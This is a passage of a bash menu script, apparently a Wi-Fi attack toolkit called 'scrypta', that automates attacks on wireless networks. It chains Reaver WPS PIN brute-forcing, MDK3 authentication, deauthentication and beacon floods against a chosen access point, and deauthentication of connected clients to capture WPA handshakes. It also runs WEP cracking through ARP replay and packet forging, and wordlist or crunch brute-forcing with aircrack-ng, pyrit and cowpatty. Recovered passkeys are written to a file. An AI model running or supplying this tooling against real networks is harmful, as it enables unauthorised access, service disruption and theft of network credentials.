698. reaver -i mon0 -c $AP_channel -b $AP_bssid $ReaverOptions -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
699. rm reaver.txt
700.  
701. ################## START OF: MDK3 ACCESS POINT RESET ############################################
702.  
703. echo ""
704. echo ""
705. echo $GREEN"Would you like to try to reset the access point? Y/n"$STAND
706. read a
707. if [[ $a == "Y" || $a == "y" || $a = "" ]]; then
708.  
709. echo "Press the [Enter] button 3 times on the kismet screen, wait 5-10 seconds then press Ctrl+c."
710. kismet ncsource=mon0:hop=true
711. sleep 5
712.  
713. echo ""
714. echo $RED"Target essid:$STAND $AP_essid"
715. echo ""
716. read -p $GREEN"Please input the above target essid.$STAND" MDK3_Target
717. echo ""
718. cat $HOME/scrypta/temp/*.nettxt | sed -n "/$MDK3_Target/,/Channel/p"
719.  
720. echo 'AP_bssid="'"$AP_bssid"'"' > MDK3_APbssid.txt
721. sleep 1
722. echo 'AP_channel="'"$AP_channel"'"' > MDK3_APchannel.txt
723. sleep 1
724. cat MDK3_APbssid.txt | sed 's/AP_bssid=//' | sed 's/"//g' > MDK3_APbssid_1.txt
725. sleep 1
726. cat MDK3_APchannel.txt | sed 's/AP_channel=//' | sed 's/"//g' > MDK3_APchannel_1.txt
727. sleep 1
728. echo $AP_bssid > Blacklist.txt
729.  
730. echo ""
731. echo $GREEN"Does the access point support WAP+TKIP?"
732. echo $GREEN"[1]$BLUE = Yes."
733. echo $GREEN"[2]$BLUE = No."
734. echo $GREEN"1 or 2?"$STAND
735. read option
736.  
737. if [[ $option == "1" ]]; then
738.  
739. read -s -n1 -p $GREEN"Would you like to scan for clients connected to the target access point? Y/n:$STAND " ClientScan
740.  
741. if [[ $ClientScan == "Y" || $ClientScan == "y" ]]; then
742. xterm -geometry 111x24+650+0 -e airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0
743. echo ""
744. echo ""
745. fi
746.  
747. echo $GREEN"Did the access point have any clients connected to it?"
748. echo $GREEN"[1]$BLUE = Yes."
749. echo $GREEN"[2]$BLUE = No."
750. echo $GREEN"1 or 2?"$STAND
751. read MDK3_ClientChoice
752.  
753. if [[ $MDK3_ClientChoice == "1" ]]; then
754.  
755. echo '#!/bin/bash
756.  
757. RED=$(tput setaf 1 && tput bold)
758. GREEN=$(tput setaf 2 && tput bold)
759. STAND=$(tput sgr0)
760.  
761. AP_bssid=$(cat $HOME/scrypta/temp/MDK3_APbssid_1.txt)
762. sleep 1
763. AP_channel=$(cat $HOME/scrypta/temp/MDK3_APchannel_1.txt)
764. echo ""
765. echo $GREEN"Press Ctrl+c on this screen to terminate the MDK3 attack and continue.$STAND"
766.  
767. xterm -geometry 100x10+675+0 -e "mdk3 mon0 a -a $AP_bssid -m" &
768. xterm -geometry 100x10+675+185 -e "mdk3 mon0 d -b $HOME/scrypta/temp/Blacklist.txt -c $AP_channel" &
769. xterm -geometry 100x10+675+345 -e "mdk3 mon0 b -t $AP_bssid" &
770. xterm -geometry 100x10+675+345 -e "mdk3 mon0 m -t $AP_bssid -j" &
771.  
772. while :
773. do
774. xterm -geometry 95x20+0+500 -e "airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0" &
775. sleep 20
776. kill `pidof airodump-ng`
777. done' > $HOME/scrypta/temp/MDK3_AP_Reset.sh
778.  
779. fi
780.  
781. if [[ $MDK3_ClientChoice == "2" ]]; then
782.  
783. echo '#!/bin/bash
784.  
785. RED=$(tput setaf 1 && tput bold)
786. GREEN=$(tput setaf 2 && tput bold)
787. STAND=$(tput sgr0)
788.  
789. AP_bssid=$(cat $HOME/scrypta/temp/MDK3_APbssid_1.txt)
790. sleep 1
791. AP_channel=$(cat $HOME/scrypta/temp/MDK3_APchannel_1.txt)
792. echo ""
793. echo $GREEN"Press Ctrl+c on this screen to terminate the MDK3 attack and continue.$STAND"
794.  
795. xterm -geometry 100x10+675+0 -e "mdk3 mon0 a -a $AP_bssid -m" &
796. xterm -geometry 100x10+675+185 -e "mdk3 mon0 d -b $HOME/scrypta/temp/Blacklist.txt -c $AP_channel" &
797. xterm -geometry 100x10+675+345 -e "mdk3 mon0 b -t $AP_bssid" &
798. xterm -geometry 100x10+675+345 -e "mdk3 mon0 m -t $AP_bssid" &
799.  
800. while :
801. do
802. xterm -geometry 95x20+0+500 -e "airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0" &
803. sleep 20
804. kill `pidof airodump-ng`
805. done' > $HOME/scrypta/temp/MDK3_AP_Reset.sh
806.  
807. fi
808. fi
809.  
810. if [[ $option == "2" ]]; then
811.  
812. echo '#!/bin/bash
813.  
814. RED=$(tput setaf 1 && tput bold)
815. GREEN=$(tput setaf 2 && tput bold)
816. STAND=$(tput sgr0)
817.  
818. AP_bssid=$(cat $HOME/scrypta/temp/MDK3_APbssid_1.txt)
819. sleep 1
820. AP_channel=$(cat $HOME/scrypta/temp/MDK3_APchannel_1.txt)
821. echo ""
822. echo $GREEN"Press Ctrl+c on this screen to terminate the MDK3 attack and continue.$STAND"
823.  
824. xterm -geometry 100x10+675+0 -e "mdk3 mon0 a -a $AP_bssid -m" &
825. xterm -geometry 100x10+675+185 -e "mdk3 mon0 d -b $HOME/scrypta/temp/Blacklist.txt -c $AP_channel" &
826. xterm -geometry 100x10+675+345 -e "mdk3 mon0 b -t $AP_bssid" &
827.  
828. while :
829. do
830. xterm -geometry 95x20+0+500 -e "airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0" &
831. sleep 20
832. kill `pidof airodump-ng`
833. done' > $HOME/scrypta/temp/MDK3_AP_Reset.sh
834.  
835. fi
836.  
837. sleep 1
838. chmod +x $HOME/scrypta/temp/MDK3_AP_Reset.sh
839. sleep 1
840. Eterm -g 100x10-640-500 --cmod "red" -T "Main Window - Press Ctrl+c to exit MDK3" -e sh -c "$HOME/scrypta/temp/MDK3_AP_Reset.sh; bash"
841. rm $HOME/scrypta/temp/Blacklist.txt
842.  
843. if [[ $a == "N" || $a == "n" ]]; then
844. echo ""
845. fi
846. fi
847. ################## END OF: MDK3 ACCESS POINT RESET ############################################
848.  
849. echo "" ;;
850. 0) exit 0;;
851. *) echo "";
852. echo "Press [Enter] to continue. . ." ; read ;;
853. esac
854.  
855. ############## End Of Reaver Attacks And Store Recovered Passkey ##############
856.  
857. ######################## LOOP ############################################
858.  
859. clear
860. read -s -n1 -p $RED"Choose another target or return to the main menu:$GREEN
861. y $BLUE= Choose another target.$GREEN
862. n $BLUE= Return to main menu.$GREEN
863. Please choose y/n?$STAND: " CONFIRM
864. case $CONFIRM in
865. n|N|NO|no|No)
866. break ;;
867. *) echo "" ;;
868. esac
869. done
870.  
871. ############## End Of Loop Section ##############
872.  
873. ############## Start Of Cleanup ##############
874.  
875. rm *.txt
876. rm *.py
877. cd
878. ############## End Of Cleanup ##############
879. ;;
880.  
881. ###### [4] Capture WPA/WPA2 Handshake ######
882. 4)
883. cd $HOME/scrypta/temp
884. clear
885. echo $RED"Scan for possible targets."
886. echo $GREEN"Once you've identified a target press Ctrl-C to exit the scan and to continue."
887. read -p $GREEN"Press [Enter] to start the scan.$STAND"
888.  
889. xterm -geometry 111x35+650+0 -l -lf WPA_Scan.txt -e airodump-ng --encrypt WPA mon0
890.  
891. tac WPA_Scan.txt | grep 'CIPHER' -m 1 -B 9999 | tac | sed -n '/STATION/q;p' | grep "PSK" | sed -r -e 's/\./ /' | sed '/<length: 0>/d' > temp0.txt
892. cat temp0.txt | sed 's/^..........................................................................//' | nl -ba -w 1 -s ': ' | awk '{ print $1, $2 }' | sed 's/^1:/ 1:/' | sed 's/^2:/ 2:/' | sed 's/^3:/ 3:/' | sed 's/^4:/ 4:/' | sed 's/^5:/ 5:/' | sed 's/^6:/ 6:/' | sed 's/^7:/ 7:/' | sed 's/^8:/ 8:/' | sed 's/^9:/ 9:/' > PresentedAPs.txt
893. sleep 1
894.  
895. PresentedAPs=$(cat PresentedAPs.txt)
896. sleep 1
897. echo ""
898. echo "Please choose an AP"
899. echo ""
900. echo "$PresentedAPs"
901. echo ""
902. read -p $GREEN"Please input the number of your chosen target:$STAND " Chosen_AP
903. echo ""
904.  
905. Chosen_AP_Details=$(cat temp0.txt | sed -n ""$Chosen_AP"p")
906. AP_essid=`echo "$Chosen_AP_Details" | awk '{ print $11 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
907. AP_bssid=`echo "$Chosen_AP_Details" | awk '{ print $1 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
908. AP_channel=`echo "$Chosen_AP_Details" | awk '{ print $6 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
909.  
910. clear
911. echo $RED"Chosen Target Details."$STAND
912. echo $RED"Aceess Point essid$STAND: $AP_essid"
913. echo $RED"Aceess Point bssid$STAND: $AP_bssid"
914. echo $RED"Aceess Point Channel Number$STAND: $AP_channel"
915.  
916. echo ""
917. echo $RED"Scan for clients connected to$STAND $AP_essid"
918. echo $RED"Once you have identified the client you wish to target press Ctrl-C to exit"$STAND
919. read -p $GREEN"Press [Enter] to start the scan."$STAND
920.  
921. xterm -geometry 100x20+650+0 -l -lf WPA_ClientScan.txt -e airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0
922.  
923. while true
924. do
925.  
926. tac WPA_ClientScan.txt | grep 'CIPHER' -m 1 -B 9999 | tac | sed -r -e 's/\./ /' | sed '$d' | sed '1,6d' | awk '{ print $2 }' > temp1.txt
927. cat temp1.txt | nl -ba -w 1 -s ': ' > ConnectedClientsScan.txt
928. ConnectedClientsScan=$(cat ConnectedClientsScan.txt)
929.  
930. sleep 2
931. echo ""
932. echo $RED"Please choose a client MAC address"$STAND
933. echo ""
934. echo "$ConnectedClientsScan"
935. echo ""
936. read -p $GREEN"Please input the number of your chosen client MAC address:$STAND " Chosen_Client
937. echo ""
938.  
939. sleep 1
940. Chosen_Client_MAC=$(cat temp1.txt | sed -n ""$Chosen_Client"p")
941. echo ""
942. echo $RED"Chosen Client MAC Address."$STAND
943. echo "$Chosen_Client_MAC"
944. echo ""
945.  
946. xterm -geometry 100x20+675+0 -e "airodump-ng -c $AP_channel --ignore-negative-one -w psk --bssid $AP_bssid mon0" &
947.  
948. echo $RED"Choose an option:"
949. echo $GREEN"[1]$BLUE = De-Authenticate The Chosen Client?."
950. echo $GREEN"[2]$BLUE = De-Authenticate All Connected Clients?."
951. echo $GREEN"[3]$BLUE = Choose another client."
952. echo $GREEN"1, 2, or 3?"$STAND
953. read option
954.  
955. if [[ $option == "1" ]]; then
956. echo "De-Authenticate a single client."
957. xterm -geometry 100x20+675+350 -e "aireplay-ng -0 10 --ignore-negative-one -a $AP_bssid -c $Chosen_Client_MAC mon0"
958. fi
959. if [[ $option == "2" ]]; then
960. echo "De-Authenticate all connected clients."
961. xterm -geometry 100x20+675+350 -e "aireplay-ng -0 10 --ignore-negative-one -a $AP_bssid mon0"
962. fi
963. if [[ $option == "3" ]]; then
964. clear
965. echo "Please choose a client"
966. echo ""
967. echo "$ConnectedClientsScan"
968. echo ""
969. read -p $GREEN"Please input the number of the chosen client:$STAND " Chosen_Client
970. echo ""
971. Chosen_Client_MAC=$(cat temp1.txt | sed -n ""$Chosen_Client"p")
972. echo ""
973. echo "Chosen Target Details."
974. echo "$Chosen_Client_MAC"
975. sleep 4
976. fi
977.  
978. clear
979. echo -n $GREEN"Re-send de-auth request or choose another client? (y or n)$STAND: "
980. read -e CONFIRM
981. case $CONFIRM in
982. n|N|NO|no|No)
983. break ;;
984. *) echo "" ;;
985. esac
986. done
987.  
988. rm WPA_Scan.txt
989. rm temp0.txt
990. rm PresentedAPs.txt
991.  
992. rm WPA_ClientScan.txt
993. rm temp1.txt
994. rm ConnectedClientsScan.txt
995.  
996. kill `pidof airodump-ng`
997. rm *.csv
998. rm *.netxml
999. mv *.cap $HOME/scrypta/Captured_Handshakes/$AP_essid.cap
1000. cd
1001. ;;
1002.  
1003. ###### [5] WEP Attacks ######
1004. 5)
1005. cd $HOME/scrypta/temp
1006. clear
1007. echo $RED"Scan for possible targets."$STAND
1008. echo $GREEN"Once you've identified a target press Ctrl-C to exit the scan and to continue."$STAND
1009. read -p $GREEN"Press [Enter] to start the scan.$STAND"
1010.  
1011. xterm -geometry 111x35+650+0 -l -lf WEP_Scan.txt -e airodump-ng --encrypt WEP mon0
1012.  
1013. sleep 1
1014. tac WEP_Scan.txt | grep 'CIPHER' -m 1 -B 9999 | tac | sed -n '/STATION/q;p' | sed '1,2d' | sed '$d' | sed '/<length: 0>/d' > temp0.txt
1015. sleep 1
1016. PresentedAPs=$(cat temp0.txt | awk '{ print $10 }' | nl -ba -w 1 -s ': ' | sed 's/^[ \t]*//;s/[ \t]*$//' )
1017.  
1018. clear
1019. echo $RED"Please choose a target"$STAND
1020. echo ""
1021. echo "$PresentedAPs"
1022. echo ""
1023. read -p $GREEN"Please input the number of your chosen target:$STAND " Chosen_AP
1024. echo ""
1025.  
1026. Chosen_AP_Details=$(cat temp0.txt | sed -n ""$Chosen_AP"p")
1027. AP_essid=`echo "$Chosen_AP_Details" | awk '{ print $10 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
1028. AP_bssid=`echo "$Chosen_AP_Details" | awk '{ print $1 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
1029. AP_channel=`echo "$Chosen_AP_Details" | awk '{ print $6 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
1030.  
1031. clear
1032. echo $RED"Chosen Target Details."$STAND
1033. echo $RED"Aceess Point essid$STAND: $AP_essid"
1034. echo $RED"Aceess Point bssid$STAND: $AP_bssid"
1035. echo $RED"Aceess Point Channel Number$STAND: $AP_channel"
1036. echo ""
1037. echo $RED"Scan for clients connected to$STAND $AP_essid."
1038. echo $RED"When you've identified a target press Ctrl-C to exit.$STAND"
1039. read -p $GREEN"Press [Enter] to start the scan."$STAND
1040.  
1041. sleep 1
1042. xterm -geometry 111x35+650+0 -l -lf WEP_ClientScan.txt -e airodump-ng -c $AP_channel --bssid $AP_bssid mon0
1043.  
1044. echo ""
1045. echo $GREEN"Did the access point have any clients connected to it?. (y/n)$STAND"
1046. read answer
1047.  
1048. if [[ $answer == "y" || $answer == "Y" ]]; then
1049.  
1050. tac WEP_ClientScan.txt | grep 'STATION' -m 1 -B 9999 | tac | awk '{ print $2 }' | sed '1,2d' | sed '$d' > ClientScan.txt
1051. sleep 2
1052. PresentedClients=$(cat ClientScan.txt | awk '{ print $1 }' | nl -ba -w 1 -s ': ' | sed 's/^[ \t]*//;s/[ \t]*$//')
1053.  
1054. sleep 2
1055. clear
1056. echo "Please choose a client"
1057. echo ""
1058. echo "$PresentedClients"
1059. echo ""
1060.  
1061. read -p $GREEN"Please input the number of your chosen target:$STAND " Chosen_Client
1062. echo ""
1063.  
1064. Chosen_ClientMAC=$(cat ClientScan.txt | sed -n ""$Chosen_Client"p")
1065. ClientMAC=`echo "$Chosen_AP_Details" | awk '{ print $1 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
1066.  
1067. echo $RED"You've chosen:"
1068. echo $RED"Client$STAND: $ClientMAC"
1069. echo ""
1070.  
1071. while true
1072. do
1073.  
1074. read -p $GREEN"Press [Enter] to start the attack.$STAND"
1075. xterm -e "airodump-ng -w capture --bssid $AP_bssid -c $AP_channel mon0" &
1076. xterm -e "sleep 1 && aireplay-ng -1 0 -e $AP_essid -a $AP_bssid -h $ClientMAC --ignore-negative-one mon0" &
1077. xterm -e "sleep 1 && aireplay-ng -3 -b $AP_bssid -h $ClientMAC --ignore-negative-one mon0" &
1078. echo $RED"NOTE: There's a 60 second delay before Aircrack-ng starts the cracking process."
1079. echo "Please wait for aircrack to start...$STAND"
1080. sleep 60
1081. aircrack-ng -b $AP_bssid *.cap -l WEPpasskey.txt
1082. sleep 2
1083. passkey=$(cat WEPpasskey.txt)
1084. sleep 2
1085. kill `pidof xterm`
1086. echo ""
1087. echo $RED"Target essid$STAND: $AP_essid"
1088. echo $RED"Target bssid$STAND: $AP_bssid"
1089. echo $RED"Target Pass-Key$STAND: $passkey"
1090.  
1091. echo -n $GREEN"Was the attack successful? (y or n)$STAND: "
1092. read -e CONFIRM
1093. case $CONFIRM in
1094. y|Y|YES|yes|Yes)
1095. break ;;
1096. *) echo $RED"Please re-enter information$STAND" ;;
1097. esac
1098. done
1099.  
1100. echo AP ESSID: $AP_essid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
1101. echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
1102. echo WEP Passkey: $passkey >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
1103. echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
1104. cd
1105. fi
1106. if [[ $answer == "n" || $answer == "N" ]]; then
1107. while true
1108. do
1109.  
1110. echo $RED"Starting packet capture, press Ctrl+c to end it"$STAND
1111. xterm -geometry 100x20+675+0 -e "airodump-ng -c $AP_channel --bssid $AP_bssid --ivs -w capture mon0" & AIRODUMPPID=$!
1112. sleep 2
1113. aireplay-ng -1 0 -a $AP_bssid -h $mon0mac --ignore-negative-one mon0
1114. sleep 2
1115. aireplay-ng -5 -b $AP_bssid -h $mon0mac --ignore-negative-one mon0
1116. sleep 2
1117. packetforge-ng -0 -a $AP_bssid -h $mon0mac -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-packet mon0
1118. sleep 2
1119. xterm -geometry 100x20+675+100 -e "aireplay-ng -2 -r arp-packet --ignore-negative-one mon0" & AIREPLAYPID=$!
1120. sleep 2
1121.  
1122. echo ""
1123. echo $GREEN"Attempt to crack the passkey if the data increases, Is the data increasing?. (y/n)$STAND"
1124. read option
1125.  
1126. if [[ $option == "y" ]]; then
1127. aircrack-ng -n 128 -b $AP_bssid *.ivs -l WEPpasskey.txt
1128. passkey=$(cat WEPpasskey.txt)
1129. rm WEPpasskey.txt
1130. kill ${AIRODUMPPID}
1131. kill ${AIREPLAYPID}
1132. rm *.ivs
1133. rm *.cap
1134. rm *.xor
1135. rm arp-packet
1136. echo AP ESSID: $AP_essid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
1137. echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
1138. echo WEP Passkey: $passkey >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
1139. echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
1140. fi
1141.  
1142. echo -n $GREEN"Was the attack successful? (y or n)$STAND: "
1143. read -e CONFIRM
1144. case $CONFIRM in
1145. y|Y|YES|yes|Yes)
1146. break ;;
1147. *) echo ""
1148. esac
1149. done
1150. fi
1151. cd
1152. ;;
1153.  
1154. ###### [6] Attack Handshake.cap Files ######
1155. 6)
1156. clear
1157. echo $RED"###################################"
1158. echo "# #"
1159. echo "# With a wordlist #"
1160. echo "# $GREEN[1]$BLUE = Aircrack-ng $RED#"
1161. echo "# $GREEN[2]$BLUE = Pyrit $RED#"
1162. echo "# $GREEN[3]$BLUE = Pyrit + Cowpatty $RED#"
1163. echo "# #"
1164. echo "# Without a wordlist #"
1165. echo "# $GREEN[4]$BLUE = Crunch + Aircrack-ng $RED#"
1166. echo "# $GREEN[5]$BLUE = Crunch + Pyrit $RED#"
1167. echo "# $GREEN[6]$BLUE = Crunch + Pyrit + Cowpatty $RED#"
1168. echo "# #"
1169. echo "###################################"
1170. echo
1171. echo $GREEN"Choose an option?"$STAND
1172. read option
1173. if [[ $option == "1" ]]; then
1174. clear
1175. echo $RED
1176. echo "############################################"
1177. echo "# #"
1178. echo "#$STAND Attack Capture File Using A Wordlist $RED#"
1179. echo "#$STAND (Aircrack-ng) $RED#"
1180. echo "# #"
1181. echo "############################################"
1182. echo
1183. echo $RED"eg: /root/Desktop/sky12345.cap"
1184. read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
1185. echo
1186. echo $RED"eg: /root/Desktop/wordlist.txt"
1187. read -p $GREEN"Wordlist location, name, extension$STAND: " WordlistNameLocation
1188. clear
1189. # Chosen user input options
1190. ############################
1191. echo
1192. echo $RED"You've chosen:"
1193. echo "=============="
1194. echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
1195. echo $RED"Wordlist location, name, extension$STAND: $WordlistNameLocation"
1196. echo
1197. echo $RED"Commands to launch:"
1198. echo "==================="
1199. echo $STAND"aircrack-ng -w $WordlistNameLocation $CapNameLocation"
1200. echo
1201. # Launch chosen commands/options
1202. #################################
1203. read -p $GREEN"Press enter to start"$STAND
1204. clear
1205. aircrack-ng -w $WordlistNameLocation $CapNameLocation
1206. fi
1207. if [[ $option == "2" ]]; then
1208. clear
1209. echo $RED
1210. echo "############################################"
1211. echo "# #"
1212. echo "#$STAND Attack Capture File Using A Wordlist $RED#"
1213. echo "#$STAND (Pyrit) $RED#"
1214. echo "# #"
1215. echo "############################################"
1216. echo
1217. echo $RED"eg: 00:11:22:33:44:55"
1218. read -p $GREEN"Access Point bssid$STAND: " bssid
1219. echo
1220. echo $RED"eg: /root/Desktop/sky12345.cap"
1221. read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
1222. echo
1223. echo $RED"eg: /root/Desktop/wordlist.txt"
1224. read -p $GREEN"Wordlist location, name, extension$STAND: " WordlistNameLocation
1225. clear
1226. # Chosen user input options
1227. ############################
1228. echo
1229. echo $RED"You've chosen:"
1230. echo "=============="
1231. echo $RED"Access Point bssid$STAND: $bssid"
1232. echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
1233. echo $RED"Wordlist location, name, extension$STAND: $WordlistNameLocation"
1234. echo
1235. echo $RED"Commands to launch:"
1236. echo "==================="
1237. echo $STAND"pyrit -r $CapNameLocation -i $WordlistNameLocation -b $bssid attack_passthrough"
1238. echo
1239. # Launch chosen commands/options
1240. #################################
1241. read -p $GREEN"Press enter to start"$STAND
1242. clear
1243. pyrit -r $CapNameLocation -i $WordlistNameLocation -b $bssid attack_passthrough
1244. fi
1245. if [[ $option == "3" ]]; then
1246. clear
1247. echo $RED
1248. echo "############################################################################"
1249. echo "# #"
1250. echo "#$STAND Attack Capture File Using A Wordlist $RED#"
1251. echo "#$STAND (Pyrit + Cowpatty) $RED#"
1252. echo "# #"
1253. echo "############################################################################"$STAND
1254. echo
1255. echo $RED"eg: sky12345"
1256. read -p $GREEN"Access Point essid$STAND: " essid
1257. echo
1258. echo $RED"eg: /root/Desktop/sky12345.cap"
1259. read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
1260. echo
1261. echo $RED"eg: /root/Desktop/wordlist.txt"
1262. read -p $GREEN"Wordlist location, name, extension$STAND: " WordlistNameLocation
1263. clear
1264. # Chosen user input options
1265. ############################
1266. echo
1267. echo $RED"You've chosen:"
1268. echo "=============="
1269. echo $RED"Access Point essid$STAND: $essid"
1270. echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
1271. echo $RED"Wordlist location, name, extension$STAND: $WordlistNameLocation"
1272. echo
1273. echo $RED"Commands to launch:"
1274. echo "==================="
1275. echo $STAND"cat $WordlistNameLocation | pyrit -e $essid -i - -o - passthrough | cowpatty -d - -r $CapNameLocation -s $essid"
1276. echo
1277. # Launch chosen commands/options
1278. #################################
1279. read -p $GREEN"Press enter to start"$STAND
1280. clear
1281. cat $WordlistNameLocation | pyrit -e $essid -i - -o - passthrough | cowpatty -d - -r $CapNameLocation -s $essid
1282. fi
1283. if [[ $option == "4" ]]; then
1284. lear
1285. echo $RED
1286. echo "############################################################################"
1287. echo "# #"
1288. echo "#$STAND Attack a Capture file without using a wordlist file $RED#"
1289. echo "#$STAND (Crunch + Aircrack-ng) $RED#"
1290. echo "# #"
1291. echo "############################################################################"$STAND
1292. echo
1293. echo $RED"eg: abcdef23456789"
1294. read -p $GREEN"Input the characters, digits, or symbols to be used$STAND: " CharacterSet
1295. echo
1296. echo $RED"eg: 10"
1297. read -p $GREEN"Input the minimum length of the passwords$STAND: " PasswordLengthMin
1298. echo
1299. echo $RED"eg: 10"
1300. read -p $GREEN"Input the maximum length of the passwords$STAND: " PasswordLengthMax
1301. echo
1302. echo $RED"eg:"
1303. echo $RED"-d <Number> = Limits the amount of times a character, digit, or symbol can appear next to its self."
1304. echo $RED"-s XXXXXXXXXX = Start point."
1305. read -p $GREEN"Input any other optional crunch commands?$STAND: " OptionalCrunchOptions
1306. echo
1307. echo $RED"eg: sky12345"
1308. read -p $GREEN"Access Point essid$STAND: " essid
1309. echo
1310. echo $RED"eg: /root/Desktop/sky12345.cap"
1311. read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
1312. clear
1313. # Chosen user input options
1314. ############################
1315. echo
1316. echo $RED"You've chosen:"
1317. echo "=============="
1318. echo $RED"Minimum length password$STAND: $PasswordLengthMin"
1319. echo $RED"Maximum length of password$STAND: $PasswordLengthMax"
1320. echo $RED"Characters, digits, symbols to be used in the passwords$STAND: $CharacterSet"
1321. echo $RED"Other crunch commands?$STAND: $OptionalCrunchOptions"
1322. echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
1323. echo $RED"essid$STAND: $essid"
1324. echo
1325. echo $RED"Commands to launch:"
1326. echo "==================="
1327. echo $STAND"crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | aircrack-ng $CapNameLocation -e $essid -w -"
1328. echo
1329. # Launch chosen commands/options
1330. #################################
1331. read -p $GREEN"Press enter to start"$STAND
1332. clear
1333. crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | aircrack-ng $CapNameLocation -e $essid -w -
1334. fi
1335. if [[ $option == "5" ]]; then
1336. clear
1337. echo $RED
1338. echo "############################################################################"
1339. echo "# #"
1340. echo "#$STAND Attack a Capture file without using a wordlist file $RED#"
1341. echo "#$STAND (Crunch + Pyrit) $RED#"
1342. echo "# #"
1343. echo "############################################################################"$STAND
1344. echo
1345. echo $RED"eg: abcdef23456789"
1346. read -p $GREEN"Input the characters, digits, or symbols to be used$STAND: " CharacterSet
1347. echo
1348. echo $RED"eg: 10"
1349. read -p $GREEN"Input the minimum length of the passwords$STAND: " PasswordLengthMin
1350. echo
1351. echo $RED"eg: 10"
1352. read -p $GREEN"Input the maximum length of the passwords$STAND: " PasswordLengthMax
1353. echo
1354. echo $RED"eg:"
1355. echo $RED"-d <Number> = Limits the amount of times a character, digit, or symbol can appear next to its self."
1356. echo $RED"-s XXXXXXXXXX = Start point."
1357. read -p $GREEN"Input any other optional crunch commands?$STAND: " OptionalCrunchOptions
1358. echo
1359. echo $RED"eg: sky12345"
1360. read -p $GREEN"Access Point essid$STAND: " essid
1361. echo
1362. echo $RED"eg: /root/Desktop/sky12345.cap"
1363. read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
1364. clear
1365. # Chosen user input options
1366. ############################
1367. echo
1368. echo $RED"You've chosen:"
1369. echo "=============="
1370. echo $RED"Minimum length password$STAND: $PasswordLengthMin"
1371. echo $RED"Maximum length of password$STAND: $PasswordLengthMax"
1372. echo $RED"Characters, digits, symbols to be used in the passwords$STAND: $CharacterSet"
1373. echo $RED"Other crunch commands?$STAND: $OptionalCrunchOptions"
1374. echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
1375. echo $RED"essid$STAND: $essid"
1376. echo
1377. echo $RED"Commands to launch:"
1378. echo "==================="
1379. echo $STAND"crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | pyrit -e $essid -r $CapNameLocation -i - attack_passthrough"
1380. echo
1381. # Launch chosen commands/options
1382. #################################
1383. read -p $GREEN"Press enter to start"$STAND
1384. clear
1385. crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | pyrit -e $essid -r $CapNameLocation -i - attack_passthrough
1386. fi
1387. if [[ $option == "6" ]]; then
1388. clear
1389. echo $RED
1390. echo "############################################################################"
1391. echo "# #"
1392. echo "#$STAND Attack a Capture file without using a wordlist file $RED#"
1393. echo "#$STAND (Crunch + Pyrit + Cowpatty) $RED#"
1394. echo "# #"
1395. echo "############################################################################"$STAND
1396. echo
1397. echo $RED"eg: abcdef23456789"
1398. read -p $GREEN"Input the characters, digits, or symbols to be used$STAND: " CharacterSet
1399. echo
1400. echo $RED"eg: 10"
1401. read -p $GREEN"Input the minimum length of the passwords$STAND: " PasswordLengthMin
1402. echo
1403. echo $RED"eg: 10"
1404. read -p $GREEN"Input the maximum length of the passwords$STAND: " PasswordLengthMax
1405. echo
1406. echo $RED"eg:"
1407. echo $RED"-d <Number> = Limits the amount of times a character, digit, or symbol can appear next to its self."
1408. echo $RED"-s XXXXXXXXXX = Start point."
1409. read -p $GREEN"Input any other optional crunch commands?$STAND: " OptionalCrunchOptions
1410. echo
1411. echo $RED"eg: sky12345"
1412. read -p $GREEN"Access Point essid$STAND: " essid
1413. echo
1414. echo $RED"eg: /root/Desktop/sky12345.cap"
1415. read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
1416. clear
1417. # Chosen user input options
1418. ############################
1419. echo
1420. echo $RED"You've chosen:"
1421. echo "=============="
1422. echo $RED"Minimum length password$STAND: $PasswordLengthMin"
1423. echo $RED"Maximum length of password$STAND: $PasswordLengthMax"
